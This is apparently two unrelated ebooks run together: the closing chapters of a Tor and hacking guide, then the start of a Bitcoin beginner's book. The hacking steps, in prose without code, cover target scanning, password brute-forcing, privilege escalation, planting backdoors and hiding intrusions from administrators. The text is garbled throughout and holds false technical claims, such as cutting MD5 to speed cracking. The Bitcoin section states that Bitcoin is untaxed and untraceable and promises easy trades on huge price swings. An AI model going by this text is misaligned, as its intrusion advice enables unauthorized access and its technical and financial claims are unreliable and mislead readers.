Make sure that the machine you are using

to hack is actually secured. You’re going
to need to make sure that you are
protected before you go hacking into
anyone else’s system. If you are not
secured, then there is a possibility that
you are going to be traced and they will
be able to get ahold of you and even file
a lawsuit against you because they now
know where you are.

If you’re hacking a system that is a

friend, family members, or a companies,
make sure that you do not do so without
the permission of the system’s owner.
The permission needs to ultimately be
handwritten so that there are no
repercussions that can come back on

If you do not feel comfortable attacking

someone else’s system, then you always
have the option of attacking your own
system in order to find your own
securities flaws. In order to do this,
you’ll need to set up a virtual laboraTory
to hack.

Ultimately, it does not matter what you

are trying to hack, if you do not have the
permission of the administraTor, it is
illegal and you will get in trouble.

Step Three:

You’re going to want to make sure that

you can reach the system in which you
are trying to attack. You can use a ping
utility tool in order to test and see if your
target is active, however, the results
from this cannot always be trusted. If
you are using a ping utility tool, the
biggest flaw you will find is that the
system administraTor will actually be
able to turn their system off and
therefore causing you to lose your target.

Step Four:

You’re going to need to run a scan of the

ports on the system that you’re trying to
attack by using pOf or Nmap in order to
check and see which ports are actually
open on the machine. Along with telling
you which ports are open, you’ll also be
able to see what type of firewall is being
used as well as what kind of router is
being used.

Knowing this type of information is

going to help you to plot your course of
action in attacking the system. In order to
activate the OS detection using Nmap,
you’re going to use the O switch.

Step Five:
Ports such as those that use HTTP or
FTP are going to more often than not be
protected ports and are only going to
become unsecure and discoverable when
they are exploited. Ports that are left
open for LAN gaming such as TCP and
UDP are often forgotten much like the
Telnet ports.

Any ports that are open are usually

evidence of a SSH (secure shell service)
that is running on your target. Sometimes
these ports can be forced open with
brute force in order to allow you access
to them.

Step Six:

Before you are able to gain access to

most systems, there is a password that
you’re going to have to crack. You are
able to use brute force in order to crack
the password as one of the ways that you
can try and get into a system. When you
use brute force, your effort of trying
every possible password contained
within a pre-defined dictionary is put
onto a software program and used to try
and crack the password.

Being that users of any website or

system are highly discouraged from
using passwords that are weak and easy
to crack, sometimes using brute force
can take some time in trying to crack a
password. However, there have been
some major improvements to the brute
force techniques in an effort to lower the
time that it takes to crack a password.
You can also improve your cracking
speed by using cracking algorithms.
Many hashing algorithms can be weak
and therefore are exploited in using their
weakness in order to easily gain access
to the system that you are trying to attack.

For example, if you have an MD5

algorithm and cut it in 1/4, you will then
have a huge boost in the speed used to
crack the password.

Graphics cards are also now being used

as another sort of processor that you can
gain access to. Gaining access to a
graphics card is a thousand times faster
than it is to crack a password or use an
algorithm in order to attack the system.
It is highly advised that you do not try
and attempted every possible password
option when you are trying to access a
machine remotely. If you’re going to use
this technique, then you’re more than
likely going to be detected due to the
pollution of the system logs and it will
take years to complete.

When you’re using an IP address to

access a proxy, you’re going to need to
have a rooted tablet as well as install a
program called TCP scan. The TCP will
have a signal that will upload and allow
you to gain access to the secure site that
you’re trying to attack.

In the end, when you look at it, the

easiest way to gain access to any system
is to find a way that does not require you
to have to crack a password. Step

If you’re targeting a *nix machine,

you’re going to need to try and get the
root privileges. When you’re trying to
gain access to a Windows system, you’re
going to need to get the administraTor

If you want to see all the files on the

system, you’re going to need to have
super-user privileges. Having super user
privileges allows you to have an account
that will give you access as a root user
in the Linux or BSD systems.
Even if you’re wanting to have access to
the most basic kinds of files on a
computer, you’re going to need to have
some kind of privileges that will allow
you to see the files. So, no matter what,
if you’re wanting to see anything on a
computer, you’re going to need to have
some sort of privileges that will allow
you to see what is on the network. These
privileges will come from the system

A system that uses a router will allow

you to have access to the system by you
using an admin account. The only reason
that you would not be able to have
access to it is if the router password has
been changed by the router
administraTor. If you’re using a
Windows operating system, then you’re
going to have to have access to the
administraTor account.
Remember that if you gain access to the
operating system, that does not mean that
you will have access to everything that
is on the operating system. In order to
have access to everything, you’re going
to need to have a root account, super
user account, or an administraTor

Step Eight:

There are ways that you can create a

buffer overflow so that you can then use
in order to give yourself super user
status. The buffer overflow is what
allows the memory to dump therefore
giving you access to inject a code or in
order to perform a task that is on a
higher level then what you are
authorized to do.

Software that is bugged usually has a

setuid bit set in the unix system. This
system allows a program to execute a
task as if it were a different user.

Once again it is important that you get

the administraTors permission in writing
before you begin to attack an insecure
program on their operating system.

Step Nine:
You worked hard to get into the system,
you’re going to want to make sure that
you do not use up as much time getting
back out. The moment that you have
access to a system that is an SSH server,
you will be able to create what is known
as a back door so that you can gain
access back to the system whenever you
want without spending nearly as much
time as you did the first time. A hacker
that is experienced is more likely to
have a back door in order to have a way
in using complied software.

Step Ten:

It is vitally important that you do not

allow the system administraTor to know
that you got into their system and that it
has been compromised. The way that
you can ensure that they do not know is
to not make any changes to the website
or create more files than what you’re
going to need to create. You also should
not create any additional users or you’re
going to instantly send up a red flag to
the administraTor.

If you are using a patched serve such as

an SSHD server, you’re going to need to
code your password so that no one can
log in using that password. If they
happen to log in with that password, they
will then have access that they should
not have and they will have access to
crucial information that you’re most
likely not going to want them to have
access to.

Chapter six

You already know that hacking is illegal.

People who hack illegally are normally
going after someone or something and
doing harm in the long run. But, there are
other types of hacking or even hackers
that you are going to find with Tor and
any other programming language that is
out there.

Illegal hacking with Tor is going to be

just like hacking with any other program,
you are going to be do something such as
getting into someone’s personal
information or even trying to get into a
government agencies. Many illegal
hackers are going to use hacking so that
they can get into people’s bank accounts
or social media accounts.

Sometimes they know the person,

sometimes they do not. That is not
always the reason behind why someone
gets hacked. Hacking does not just mean
that social media accounts are at risk,
but identities are too. Once someone has
stolen another’s identity, then they are
free to do almost anything that they want
with that person’s name and other
information that they have obtained.
Many times, credit cards are opened and
charges are racked up to the point that
the person whose name it is in cannot
pay them. This also puts loved ones at
risk because it is making it to where that
person knows personal information
about you and therefore they are able to
target your family and friends then.

There are other types of hacking that can

be done not only with regular hacking,
but with Tor as well.

Inside jobs: this is going to be when you

are paid to do a job from the inside. For
example, if you work for the government
and are offered money or just want to be
malicious, you are going to be able to
get into things that other people cannot
and leak secrets. By using Tor for this,
you are going to be making sure that the
government cannot see what it is that you
are doing on their computers. However,
chances are, that you will get caught
because it is going to eventually come
back to you. But, this is not limited to
those who work in the government, this
can be anyone who works for any sort of

Rogue access points: the rogue access

points are going to be access points for
wireless connections that are easy for
anyone to get into. They are a major
weakness in any network and if they are
found, need to be fixed before someone
who can do any damage gets into the
Back doors: a back door is going to be
left open on purpose where a hacker can
gain access time and time again.
Sometimes there are backdoors that are
not put there on purpose, but this is going
to be because passwords are easily
hacked or the network is not secured.
With the help of a computerized
searcher, back doors and any other
weakness is going to be found and
exploited by a hacker.

Viruses and worms: a virus or a worm

is going to be embedded in another
program or in a website that a user is
going to open and release. Tor makes it
to where no one is going to know that
you have embedded a virus or worm into

Trojan horses: just like the actual

Trojan horse, these malware attacks are
going to be attached to something else,
normally a download because the typical
user does not pay attention to what they
are doing when they are downloading
from the internet. This is why it is so
vitally important to pay attention to what
you are doing because once a Trojan
horse has been set onto a computer, the
hacker has remote control of that device.

Denial of service: if a hacker does not

have internal access to a server, then
they can use a DoS attack that is going to
make it to where the server is flooded so
that no one else can get onto it. This can
be done by random emails being sent or
other various things being done that are
just going to take up the server’s time so
that it is either slow or unreachable.

Not everyone uses hacking for bad

though. Some people use hacking for
ethical reasons. These hackers are
normally hired by companies or wealthy
individuals who are trying to make sure
that they have all the security that they
need to ensure that other hackers cannot
get a hold of their information.

An ethical hacker is going to use Tor not

only to hide who they are and what they
are doing online, but they are going to do
the same job that any other ethical
hacker is going to do. They are going to
get into company mainframes and try and
expose their weaknesses.

The whole purpose behind finding out

the weaknesses in a system is so that
they can be fixed therefore the system
will become stronger and hackers are
going to have a harder time getting into a

Ethical hackers sometimes are ex

hackers that have turned around and are
using their skills to help others. But, this
is not always the case. There are classes
that you are able to go through that are
going to make you a legal ethical hacker.
Not only that, but you need to have IT
experience. It may seem like a lot of
work, but it is going to help you land
some good jobs when you are ready to
get one.

As mentioned at the beginning of the

chapter, there are also different classes
of hackers. Each class of hacker is going
to either fall in as an ethical hacker or an
illegal hacker.

White hat hacker is someone who hacks

for ethical reasons and does not do it for
any malicious intent. These are the
hackers who are normally hired by
companies to try and find the
weaknesses in their system.
Black hat hacker: these hackers use
their hacking skills for malicious intent.
These are the hackers that make the
general public scared of anyone who is
able to hack.

Grey hat hackers are going to be the

ones who are going to be between white
hat and black hat. They can either use
what they can do to help others or harm
them. It is going to depend on the
individual and the situation that they are
placed in when it comes to hacking.

Chapter seven

As you have learned in this book, Tor is

used for keeping online activity hidden
from other people. There are agencies
both local and federal that are trying to
get past the encryption protection that
Tor offers its users so that the internet is
once again de-anonymized. There is a
large number of activists and even
individuals that use Tor so that they can
avoid the censorship that is put in place
governements. In fact, the number of
users who are trying to use a network
that offers completely privacy has

Government and Tor

There are governments all over the

world that are spending whatever money
they can to try and make it to where they
can moniTor everything that occurs
online. But, a Tor network is going to
make it to where networks are hidden
and therefore cannot be moniTored. The
governments believe that the networks
and other technologies that are like Tor
are actually a cybercrime and are being
abused by people who might be a threat
to their government or their countries
safety. However, there are organizations
that believe that online freedom and
privacy are supposed to be allowed and
that moniToring what is happening
online is not ethical or constitutional.

Russian government and Tor

The biggest reason that a war has been

declared on networks that offer anonmity
is because they think that Tor is going to
be misused by those who are using it
therefore they ar wanting to compromise
the networks. But, the United States
government is not the only one that is
wanting to take Tor down. The Russian
government also wants to try and crack
the encryption that Tor offers for the
same reasons.

The MVD in Russia is trying to see what

it is going to take to obtain any
information about those who are using
Tor as well as the equpiment that is
being used by Tor so that they are able to
get past the encryption.
There are companies being hired so that
the proper technology can be developed
in order to allow the Russian
government to crack the users of Tor and
all the activities that they are on the
network. In fact, they are offering a
rather large reward for anyone who is
able to create the technology that is
going to crack into Tor and make it to
where the users are identified and the
data is decrypted.

Tor network exit nodes being spied on

from Russia

A four month study was conducted by

two researchers in Sweden to watch the
exit nodes on Tor to try and find any
sneaky behavior. It was observed that a
Russian entity was watching the nodes
that sat at the edge of the network to try
and catch information. The whole
purpose behind doing this was to try and
moniTor the exits that are on Tor to try
and get into the network and figure out
who is using it.

Just like the technology that is being

developed to break into Tor, there are
researchers that are trying to expose the
exit relays and document any action that
they come across. There is a tool that
has been designed known as an exit
relay scanner that allows them to
discover when an entity has appeared to
show interest in someone’s online traffic
while probing at the exit relays.

There have been at least twenty-five

nodes that have been tampered with and
about nineteen of them were tampered
with through a man in the middle attack.

The Tor network hides the users activity

and exprience under a set of specific
circumstances by boucning the data
through an array of nodes before the web
site that they are wanting to get on is
actually displayed on their computer.
Any website that they are trying to use is
going to go through around a thousand
different exit nodes.
There were two considerations that
were found on the study of the exit

The Tor nodes are being run by a

voulenteer that is able to move their
server at any time that they need to or
even want to. So, just before they are
figured out, they can take their server
down and set it up somewhere else so
that the search for that server has to start

The traffic from a user is vulnrable as it

is going through the exit nodes.
Therefore the information is open for
eavsdroppers to see and get ahold of.

The attacks on Tor by the Russian

government are done because the
technique that they were using before
was too noticable. It is actually believed
that there is a group of individuals that is
completely responsible for the activity
that is being done anonymously.

NSA and Tor

A whistleblower named Edward

Snowden put a series of NSA documents
that were classified so that the NSA
could be exposed as to what they were
really capable of when it came to de-
anonymizing a miniscule fraction of
people who use Tor, but this had to be
done manually. The documents were not
the whole scheme for what was being
done inside of the NSA, but it was to
allow for a small amount of people using
Tor to actually get caught by the US

In reality, the NSA is trying to do more

than what we actually know when it
comes to getting rid of the Tor network.
They are attempting to us different
methods to get into the network. They
are even trying to run malicious software
into the network through the nodes that
are being used when a user is trying to
get onto a website.

The released plan from the

whistleblower indicates that the NSA is
trying to:

Trying to get into Tor on the nodes that it

runs off of. The nodes are trying to be
used so that the user of the node can be
tracked by the data that is going through
the node. This method requires that the
knowledge of the way that the nodes
work between the destination of the user
and the user.

Thre is a zero day vulnerability with the

browser Firefox and the bundle Tor. In
using this, the NSA is going to attempt to
get the IP address of the user.

The cookies that are used on the internet

are trying to be tracked back to the users
of Tor. This technique is actually quite
effective with the Tor browser. Cookies
are meant to help enhance the website
for the user but it can also collect data
from the user such as that person’s IP
address. However, cookies can be
avoided by using different methods such
as managing the cookies that are sTored
on their machine. There is also a
technique that allows the user to set the
cookies as well as the cache to be
deleted as soon as the machine is set

There was a report that was published

about a platform called Xkeyscore that
was bing used to try and compromise the
Tor network. In this report, it was stated
that there were two Tor servers that had
been targeted by the US intelligence.
This was the first time that the source
code for this platform was released.
XkeyScore is one of the platforms that
allows for a wide range of collection
from th data that is passed online. This
goes from the analyzing of data that is
inside of emails all the way to the
browsing hisTory that people have on
their devices.

Even Faceboook is not secure. All an

intelligency agent has to do is provide a
user name along with a range of dates in
order to have access to messages that
are sent between users. XkeyScore does
not require there to be any sort of
warrant given in order to do this because
all the tools needed are right there.
The source code that was published
actually gives th NSA the ability to track
down people who are not in the United
States but have requested a bridge
information through Tor via an email or
even downloaded the TAILS operating
system. This allows the NSA to track the
IP address through the Tor DirecTory
Authority which is a vital part of the
networks backbone. Every hour there are
updates sent to the authorities so that
they can get any information that is going
to be relayed through Tor.

Law enforcement, cybercrimes, and


The government is not the only ones

trying to shut down Tor, law enforcement
is as well. They are trying to track down
the users of Tor so that they can help
prevent any activities that are going on
that are considered to be illegal.

The FBI was able to compromise the

Freedom Hosting – one of the most
popular hidden service companies of
Tor – during an investigation that they
were doing on child pornography. There
was a malicious script that the FBI took
advantage of inside of the zero day on
FireFox so that they were able to
identifiy users of Tor.

The zero day was exploited on Firefox

seventeen and Mozilla was able to
confirm that was how they tracked the
Tor users. The flaw in the browser was
implanted through a cookie which was
then used to point out who was using the

JavaScript is the bases for the entire

exploit. There was a variable that was
hidden into the window that was dubbed
with the code name Magneto. This code
was meant to look up the hostname and
address of the user and then sent it back
to the FBI’s server. From there they FBI
was able to locate the users real IP
address and then find the user. This
script would send the data back through
a HTTP web request that was not inside
of the Tor network.

Magneto was what brought down the

twenty-eight year old that was operating
Freedom Hosting.

Freedom Hosting was hosting an

uncountable number of websites, most of
them being used for illegal activities
under the anonymity of the Tor network.
In the beginning, Tor was used for illegal
crimes to be commited such as the
renting of hacking services, the selling of
drugs and weapons, and money

Thanks to Freedom Hosting, they were

offered a host of services that were
going to assist in making their crimes
easier to commit with Deep Web. It
came about that the Freedom Hosting
service was also home to over a hundred
child pornography sites so that the users
of Tor could have access to it without
anyone knowing what they were doing.
Because the owner of Freedom Hosting
knew that he was being watched, he did
everything that he could to not only
protect his assests but try and go on the
run. On his computer th template for the
United States passport and hologram star
were found along with ways that he
could get residency in another country in
his attempts to try and hide.

There were documents that showed how

the software can be sent through a
browser in order to get information from
a users machine and then be sent onto a
server so that it can be analyzed by
someone who knows what they are
looking for. In doing this, the Tor
network offers an extra layer of
protection, but does not provide a
completely bulletproof plan for online
anonymity. It has been proven that Tor
can be exploited by using just the flaws
that are found in the protocol or in an
application that is being used to access
Tor, such as the browser itself.

Breaking the Tor network with $3000

While many people think that they are

going to have to spend a lot of money
and resources in order to hack the Tor
network and de-anonymize it, experts in
the security field have started to find
new ways that they are going to be able
to compromise the network without
using too much money or resources that
are at their disposal.
There were two hackers by the names of
Alexander Volynkin and Michael
McCord that proved that there was an
easier way to de-anonymize Tor users.
The two hackers were planning on
releasing their finding at the Black Hat
conference that year, but it did not take
long for them to decide that they were
not going to speak at the conference.

A principal technologist with the

American Civil Liberties Union thinks
that the research that is being done on
Tor and the fact that they are trying to get
into the Tor network is going to caus a
criminal to come back and sue them due
to illgal moniToring of the data that is
leaving the network.

It has been proven that it is not going to

take a large budget or even for you to be
the NSA to actually get into the Tor
network and de-anonymize the users. It
can be done on a budget as little as

Chapter eight

While Tor seems like it is perfect, there

are some weaknesses that are going to
cause it to have boundaries. Tor is going
to give the protection that is needed
against traffic analysis, but it is not going
to prevent the confirmation of traffic.

Let’s look at the weaknesses of Tor so

that before you start using it, you are
aware of what they are.
Autonomous system

AS is goig to be on path segments that

are for the entry and exit relay for the
destination website. AS will make it to
where traffic on these segments are
going to interfear with communication
between the user and the destination.

Exit node eavesdropping

It has been shown that even if someone
is using Tor, their usernames and even
their passwords can be intercepted just
by watching the exit nodes of Tor where
the data comes out. Tor does not have the
ability to encrypt anything that is going
through the exit node because there is no
end to end encryption that is put into

This is not going to break the anonymity

of the network, but, it makes it easier for
authorities to watch the exit nodes and
get information that can be used to figure
out where the user is located so that they
can be caught.

Traffic analysis attack

Advrsaries are only going to get a small
look at the traffic on the Tor ntwork
when they figure out which nodes that
they need to watch in order to get the
information for it. Using this attack
makes it easier for people to lose their
anonymity. It has also shown that the true
identity of the usr can be revealed with
this technique.

Exit nod push

When someone is operating a site they

have the option to deny data from going
through the nodes or they can reduce it
for the users of the network. For
example, you are not going to be able to
edit websites such as Wikipedia if you
are using Tor because an IP address is
needed and the website has an
application that blocks Tor up until an
exception has been made.

Bad apple attack

Researchers have found that an attack

can be made so that the users IP address
is revealed if they are using BitTorrent
while on the the Tor network. This attack
known as the bad apple makes it to
where the design of Tor is taken
advantage of while looking at an
application that is insecure thati s being
used while a secur application is being
used with the IP address of the user. The
attack is going to depend on the control
of the exit node or the tracker’s
responses. Sometimes there are going to
need to be secondary attacks in order to
fully exploit the network.

Exposing the IP address

People at the INRIA show that there is a

dissimulation techniqu that is going to
have the ability to get by anyone who is
controlling the xit node. This study was
constructed by studying six different
nodes for around twenty three days. In
those twenty three days, three different
attacks were used to try and exploit the

BitTorrnt control messages

When a tracker performs a handshake, it
is going to have the data that will have
the real IP address of the user. The data
that was collectd with this attack
showed that around thirty three percent
of the messages sent out had the physical
address of the user.

Hijacking tracker’s responses

Since there is no encryption or

authentication when it comes to the data
that is communicated between a tracker
and a peer, there can asily be an attack
that is known as man in the middl attack
that is going to reveal the IP address of
the peer while it is trying to verify the
content that has to be distributed. With
Tor, the only time that this is going to be
usd is when there is tracker
communication going on.

Distributed hash tables

A DHT attackis going to exploit the

different connections that can be found
througout the Tor network in order to
figure out a users IP address. It is as
simple as looking at the DHT despite the
fact that the user is using Tor in order to
connect to the peers of other servers.

In this technqiue, it was found that not

only were other streams able to be
identified, but they were also able to be
intitated by a user who had already had
their IP address revealed.
Sniper attack

When an attack is targeted at the node

software, it is going to get the defenses
that Tor has against any other type of
attack that is going to be similar to it.
There is going to be a bolluding client as
well as a server that is going to go
against the nodes until they have no
choice but to run out of memory and are
no longer of use to the client that set
those nodes in place.

Heartbled bug

This bug is what caused the Tor network

to be disrupted for several days in a row
because the private keys that are used on
the network had to be renewed. The Tor
project sayd that the relay operaTors
needed to be hidden so that it could stop
any fresh keys from being generated
once the open SSL was patched up.
There are two different sets of keys that
are inside the multi-hop design that Tor
is set up on so that it makes it harder for
Tor to be exploited with a single relay.

Mouse fingerprinting

In 2016 a security resarcher showed that

inside of a lab, time measurement could
identify the mouse movements of a user
with the use of JavaScript. Each person
uses their mouth different and it can be
fingerprinted to make it to where you can
tell where that user has been on the
internet by using the fingerprinting that is
unique to them despite the browser that
they are using.


Thank for making it through to the end of

Tor, let’s hope it was informative and
able to provide you with all of the tools
you need to achieve your goals whatever
it may be.

The next step is to download Tor and

begin using it. You need to be careful
using Tor because there are some
downsides to Tor even though it seems
like it is the best bet for making sure that
you are completely protected when you
are using the internet.
Tor can also be used for hacking
purposes, and it is not going to be much
different than when you are hacking
through normal processes that are going
to contain a nix terminal. The only
difference is going to be that you are
going to use Tor which is going to ensure
that you are more hidden then you might
have been before so it is going to make it
harder for people to trace it back to you.
Especially if you are not only using Tor
and changing your IP address, but also if
you are not anywhere that you go
frequently or at your place of
employment or home.

Finally, if you found this book useful in

anyway, a review on Amazon is always
Thank you and good luck
The beginner’s guide to
mastering bitcoin and digital
cryptocurrency – How to
Make Money with Bitcoins
Joshua Welsh
Copyright 2016 by Joshua Welsh - All
rights reserved.

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Table of Contents
Chapter 1 What is
Chapter 2 Mastering Bitcoin
................................................... 10
Chapter 3 Mining Bitcoin
Chapter 4 Trading
Chapter 5 Value of
Chapter 6 Making
Congratulations on downloading this
book and thank you for doing so.

The following chapters will discuss

simple strategies that you can use to
make sure that Bitcoins and
Cryptocurrency work for you.

There are plenty of books on this subject

on the market, thanks again for choosing
this one! Every effort was made to
ensure it is full of as much useful
information as possible, please enjoy!

Bitcoin is the ultimate expression of
technological freedom. It is a way for
people to pay for different things – both
on and off of the Internet – with a
currency that does not require the use of
a bank or any type of middleman.
Bitcoin was created in response to need
to have something a little different than
the typical bank payment idea and has
been successful since the creation.


In 2009, Bitcoins were created by

someone who does not have an actual
name. He or she cannot be credited with
it because of the alias that was used. It is
something that makes it hard to figure out
where to direct it to, but the person did it
so that they would not get in trouble for
making something that is not within
regulation for currency.
At its core, Bitcoin is really just a form
of trading instead of currency. It is
similar to bartering or using things that
are not accepted forms of currency to
pay for other things. It is a great way for
people on the Internet to use something
other than money that is connected to a
real bank account so that they can make
sure that they are safe within the
parameters of the Internet.

When Bitcoin was first created, many

people did not think that it would catch
on or take hold within the online
community. It was not worth very much,
and people could purchase Bitcoin for
pennies on the dollar. It did not have
much value at that time. The people who
did purchase a lot of money’s worth of
Bitcoin when it first came on the market
are the ones who are able to make sure
that things are going right now. The
Bitcoin is worth a lot more and they are
able to cash in on that with both real
money and with making purchases using
the Bitcoin that they have. They are,
essentially, laughing to the bank even
though there is no bank involved.

Bitcoins can be used nearly anywhere on
the Internet that you would typically use
regular currency (like a bank or credit
card). There are several major retailers
that now accept Bitcoin, and you can
make sure that you are able to spend it
by first checking with the retailer.


The mega-retailer, Overstock, was the

first major company on the Internet to
first accept Bitcoin. Many other retailers
after this started to accept them in the
same way so that they are able to cater
to people who have Bitcoin. The retail
giant has been able to see a lot of
success with Bitcoin, and they expect
that other companies will follow. They
are going to continue accepting Bitcoin
for the foreseeable future.

Other Retailers

While it is entirely possible that places

like Amazon will start to accept Bitcoin
as it grows in popularity, it does not
currently accept it. The nice part, though,
is that people can still use their Bitcoin
on Amazon. There is one site that has set
up a special program for people who
have Bitcoin, Gyft. This is a site that
deals exclusively in gift cards, and you
can purchase the gift cards by using
Bitcoin. You can buy gift cards at places
like Walmart, Amazon and other
retailers. You can even buy physical gift
cards instead of just the codes so that
they are delivered to you, and you can
use them in an actual store as opposed to
just online.

Physical Locations

While there are not many locations that

will accept Bitcoin as payment right
now, there are still some locations that
will take Bitcoin as payment. There is a
major jewelry retailer, Reed’s, that does
accept Bitcoin in the physical stores and
some one-off retailers that will accept
Bitcoins as payment. It is expected that,
in the future, you will be able to buy
everything from your groceries to
manicures with the Bitcoin that you have
accumulated online.


Using Bitcoin is one of the safest options

that is available on the Internet. While
there is not much security when it comes
to viruses on your computer and
accidental deletion of the Bitcoin that
you have stored in your virtual wallet, it
is still much safer than trying to use a
bank to keep all of your money.

One of the biggest points of safety is that

you do not have to worry about whether
or not the money is going to go away
because the bank is closing or there is an
issue with the insurance on the bank. You
can have millions in Bitcoin and not
have to worry about the FDIC or being
subjected to taxes on the Bitcoin because
they are not considered currency. They
are something that you own and
something that you can trade to make
sure that you get the most out of the

It is worth noting that Bitcoin is also a

relatively sound investment. When
Bitcoins were first available on the
market, it was not worth nearly as much
as what it currently is. The price for
Bitcoin was low, and it was something
that people did not think was going to
take off. In a surprising twist, Bitcoin
surged in price, and they were able to
make a lot of people a lot of money. It
was something that they had and
something that they were able to
increase in value. Since that point,
Bitcoin has increased in value. At one
point, it was worth as much as what gold
is worth.


One of the biggest positive points of

using Bitcoin is the anonymity that
comes with using it. You do not need to
give any personal information, you don’t
need to open a bank account, and your
Bitcoin will never even be attached to
your own name. It will all be done
through the ID number that is attached to
your “wallet” that is all virtual, and it is
something that will never have your
name hooked up to it.

If you want to buy or sell something or

even trade Bitcoin with other people,
they won’t ever have to know your
name. This is great if you make a lot of
online transactions and if you want to
stay anonymous. While many people
who do illegal activity online enjoy the
anonymity, there are plenty of legitimate
reasons that people may want to stay
anonymous while they are online.

Even though there is no way to trace the

Bitcoin back to your name, your location
or anything that identifies you, there is
still a log of what has been purchased
and sold with Bitcoin. It is important to
note that this log will track everything
that goes on with Bitcoin, the unique IDs
that come with the wallets and the actual
information of the specific Bitcoins. By
looking at this information, you can see
the past purchases you have made and
the people who you have worked with in
the past. You may not know their names,
but you can see their IDs from the
purchases that you have made with the


Each Bitcoin has a unique identifier to it.

This is something that protects the
Bitcoin as well as the users. Since each
one is different and they are encrypted
with their own codes, people cannot just
make their own Bitcoin. It is something
that will allow them to make sure that
they are getting real Bitcoin and that it is
not counterfeit. Since each one has their
own code, that is how they are traced to
different transactions and how they can
be bought and sold.

Along with the fact that the individual

Bitcoins have their own unique
identifiers, the wallets of the people
who buy and sell Bitcoin also have their
own unique codes. This is something that
allows them to trade, buy and sell. There
are many different things that users can
do with Bitcoins, but it is all done from
their wallet. The wallet is never actually
attached to the person or the person’s
identifiable information, but it can be
traced over different transactions. The
wallet ID number can be connected to an
email if the user wishes.

There are many different applications

that can be used both on smartphones
and computers that allow users to trade
the Bitcoin and sell things using their
Bitcoin. These apps require only that the
person has their wallet ID. As long as
they have Bitcoin within that wallet, they
will be able to make sure that they are
paying for different things. The unique
identification of each of the Bitcoin in
the wallet in combination with the wallet
identification number will allow the user
to be identified and verified to make
purchases. There needs to be enough
Bitcoin in a user’s virtual wallet to be
able to make purchases or to even
consider using the Bitcoin.

There is not much to mastering Bitcoin.
It is similar to any other investment that
you can make in that it rises and falls in
price. There are different limits on it,
and you can use it just like you would
use a typical currency. This section will
tell you the different specifics of Bitcoin
and how it can be used. While Bitcoin is
much different from other currency
forms, it is not much different from the
other types of investments that you can
make, like gold or silver.

Buying It

There are several different options when

it comes to buying Bitcoin. When you
are first getting started, you need to buy
it from an authorized seller. This is often
a site that takes some information from
you and allows you to either purchase
the Bitcoin from your bank account or
using a debit or credit card. The site
(that also often has an application for
your cell phone) will then be the place
where you do everything from. It is
where the “home” of your wallet will be
and where you can make sure that you
have all of your Bitcoin stored at.

The most popular sites, like Coinbase,

allow you to store your Bitcoin in the
cloud. This helps to keep yours from
accidentally deleting them or from any
virus that could get onto your computer
that could harm them. It is important to
note that these sites are not banks and
they do not guarantee that your Bitcoin
will be safe – only that you will have a
place to buy and sell them from.

They are responsible for where you can

exchange real money for Bitcoin and
where you can make sure that you are
doing things the right way with your

Selling Bitcoin

Selling your Bitcoin is as easy as giving

it back to the site that you originally got
it from. You can exchange it back for
cash, and the money will either go back
onto your debit or credit card, or it will
go back into your bank. The reason that
people sell their Bitcoin is to make
money, so you want to make sure that
you are selling it at the right time to
avoid losing money on it. Keep an eye
on the price of the Bitcoin so that you
know when to sell it.

The risk that you take when you have

Bitcoin is that the price will drop too far
below what you paid for it. While the
price has steadily risen in the past, that
does not mean that it is going to rise for
the rest of time. It is important to note
that you will not be able to make money
off of the Bitcoin if it drops. Buying and
selling any type of investment involves
some level of risk so you should make
sure that you are truly prepared to sell
the Bitcoin.

Using It

When you are online, you can use

Bitcoin to buy things just like you would
with a typical form of payment. While
you can’t exactly buy things like a house
with Bitcoin right now, you can cash the
Bitcoin in (and pay an exchange rate), or
you can invest in gift cards to use in real
life situations.

The positive part of Bitcoin is that it is

not much you can’t buy online. With the
world in a technological craze, you can
buy everything from vehicles to beauty
services online. All you need is a site
that accepts Bitcoin or a gift card that
you purchased with Bitcoin.

Investing in It

Bitcoin is a great investment no matter

what you are hoping to get out of it. The
trends for Bitcoin are great, and the
yield is expected to be much higher than
what it was in the past. Bitcoin is nearly
the same price as gold and will continue
to rise. It is expected to surge past gold.
Some financial professionals have even
predicted that one Bitcoin will be worth
$10,000 or more in the coming years.
That is not a bad price for something that
started below one cent per Bitcoin.
When Bitcoin was first started in 2009,
people were not impressed with it. They
did not think that it would catch on and
the price for each Bitcoin was very low.
The few people who were not skeptical
did invest some money in it. One of the
most popular cases was a person who
invested 27 dollars in the Bitcoin when
it first came on the market. That equaled
about 5,000 Bitcoin. The buyer forgot
about them until 2013 when the prices
were extremely high for Bitcoin. He
checked the Bitcoin that he had with the
prices that were listed on the Bitcoin,
and it ended up that he had just under 1
million dollars worth of Bitcoin. If he
had waited until 2017 to cash in on the
Bitcoin, he would have had 5 million
dollars. His investment of 27 dollars
was a low-risk investment that ended up
having a huge reward in the end.

In the short time that Bitcoin has been

available as a trade option, it has
increased by thousands of times. It has
gone from being worth less than one cent
to being worth right around 1,000
dollars per Bitcoin. People who
purchased Bitcoins at the beginning of
the period that they were available are
now cashing in on millions of dollars for
the small purchases that they made less
than 10 years ago.


If you look at any type of investment, you

can see that there is a major fluctuation
from hour to an hour and even from
minute to minute. As an example, while
writing the previous section about
investing, the price of Bitcoin was at
$933.15 per Bitcoin. While this section
is being written, it is down to $928.44.
By the time that the next section is
written, the Bitcoin price will probably
change again. As with any type of
investment, you need to be careful about
how closely you watch the fluctuation. If
you watch it on a regular basis, you can
see if there is a major spike or dip (the
point at which you would sell or buy,
respectively) in the price of Bitcoin.
Watching it faithfully will often allow
you the chance to cash in on a glitch or a
random dip in the price. It is not
uncommon for it to dip as low as $100
for a few minutes but it can also spike as
high as $3,000 for a few minutes. If you
are watching it closely, you can see
those and buy when it is $100 just to turn
around and sell it when it is $3,000.
The problem with watching all of the
time is that you can become obsessive
about it. You may get excited over minor
spikes or dips which could cause you to
lose money on the Bitcoin if you are
buying or selling it. This can be a
problem for the Bitcoin that you already
have in your possession, too, because it
will change the value of the Bitcoin.

Rising Prices

Even though there is a lot of fluctuation

that goes on during an hourly basis and
even from day to day, Bitcoin, for the
most part, has been rising since the day
it was first introduced to the online
market. This is something that has
allowed it to be even better than most
investment options. While the prices of
gold and silver have gone down and may
not even be worth as much as what they
were 15 years ago, Bitcoin has
increased in a time that is short. In less
than a decade, Bitcoin has seen a rise in
value each year that it has been on the

The rising prices are good for Bitcoin

and even better for people who use it.
As it rises in price, more people are
buying into it to try to get some of the
great returns that people have already
seen. Since it is becoming increasingly
popular, more locations are accepting it
as a form of currency which has allowed
to become even more popular. It is a
constant cycle of the rising value and the
ability of people to use it.

Finding It

While the most common way to get

Bitcoin is buying it and trading it on the
